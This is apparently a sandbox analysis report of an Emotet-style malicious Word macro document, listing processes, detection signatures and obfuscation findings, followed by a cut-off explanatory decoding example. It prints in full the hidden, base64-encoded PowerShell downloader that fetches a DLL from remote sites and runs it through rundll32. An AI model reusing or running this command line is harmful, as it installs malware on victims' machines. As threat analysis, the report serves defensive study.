                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023E05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002362A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002380BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002348BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00231280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00243895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002388E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002412E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002426F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002420C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002396CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00248ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002442DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023F536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00240D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00240F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023B112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00245D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00247F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00237B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00240B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00241773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00238F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00249B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00248F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00236754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023B75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002369A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002473AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002317AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002461B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00246DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00249586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023F98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00237998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00236D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00243FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002471EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002467E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002463C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00241BDF
Source: pack 2254794.doc | OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation | OLE, VBA macro: Module Wm_t404p8v_, Function Document_open
Source: pack 2254794.doc | OLE indicator, VBA macros: true
Source: 00000005.00000002.2096095535.0000000000296000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2096289799.0000000001BD6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: O_5Z.dll.5.dr | Static PE information: Section: .rsrc ZLIB complexity 0.994955920298
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@18/8@1/2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00231C88 CreateToolhelp32Snapshot,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$ck 2254794.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD0B6.tmp
Source: pack 2254794.doc | OLE indicator, Word Document stream: true
Source: pack 2254794.doc | OLE document summary: title field not present or empty
Source: pack 2254794.doc | OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe | Console Write: ............K........................... ...............................x...............#...............................h.......5kU.............
Source: C:\Windows\System32\msg.exe | Console Write: ............K...@...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................................................`I.........v.....................K........t.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................p.j....................................}..v.....o......0...............................@...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................p.j..... ..............................}..v....Xp......0.................t.............@...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................ip.j....................................}..v.....}......0...............................@...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................ip.j......t.............................}..v.....}......0...............H.t.............@...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....#................p.j....................................}..v....X.......0...............................@...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....#................p.j..... ..............................}..v............0.................t.............@...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....'................M.j....E...............................}..v....P&......0.................t.............@...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....+................M.j....E...............................}..v.....d......0.................t.............@...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: pack 2254794.doc | Virustotal: Detection: 30%
Source: pack 2254794.doc | ReversingLabs: Detection: 32%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [same encoded command as above]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2096601177.0000000002110000.00000002.00000001.sdmp
Source: pack 2254794.doc | Initial sample: OLE summary subject = backing up Grove Avon systematic copy THX Steel functionalities Upgradable infrastructure Technician

                    Data Obfuscation:

                    Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                    Source: pack 2254794.doc | Stream path 'Macros/VBA/Oi5oelv0_s4' : High number of GOTO operations
                    Source: VBA code instrumentation | OLE, VBA macro, High number of GOTO operations: Module Oi5oelv0_s4
                    Obfuscated command line found
                    Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                    PowerShell case anomaly found
                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                    Suspicious powershell command line found
                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10008085 push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10004ADA push ecx; ret
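The three signatures above (obfuscated command line, PowerShell case anomaly, suspicious PowerShell command line) describe one launcher: cmd.exe caret escapes keep the string "powershell" out of the command line, the interpreter name is spelled POwersheLL, and -ENCOD is an abbreviated -EncodedCommand carrying a UTF-16LE base64 script that in turn hides type names behind "{1}{0}" -f reordering and its URL list behind string concatenation. The following example is added here and is not part of the Joe Sandbox report: it normalizes such a command line, decodes the payload, and statically folds those string tricks without executing anything. The embedded script is the report's own decoded prefix (cut where the report truncates it); the cmd.exe line around it is constructed; and the assumption that the marker ']anw[3' stands for 'http' is the usual Emotet construction, since the report truncates the .Replace() argument.

```python
import base64
import re

# Constructed sample: the start of the script Joe Sandbox decoded from the -ENCOD
# payload in this report, cut where the report's own listing is truncated.
DECODED_SCRIPT = r'''$95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = 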